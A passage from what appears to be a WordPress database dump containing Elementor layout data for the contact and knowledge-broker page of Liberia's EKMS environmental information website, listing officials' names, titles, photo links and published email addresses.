Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23385,3398,'_elementor_edit_mode','builder'),(23386,3398,'_elementor_template_type','wp-page'),(23387,3398,'_elementor_version','3.0.16'),(23388,3398,'_wp_page_template','default'),(23389,3398,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a 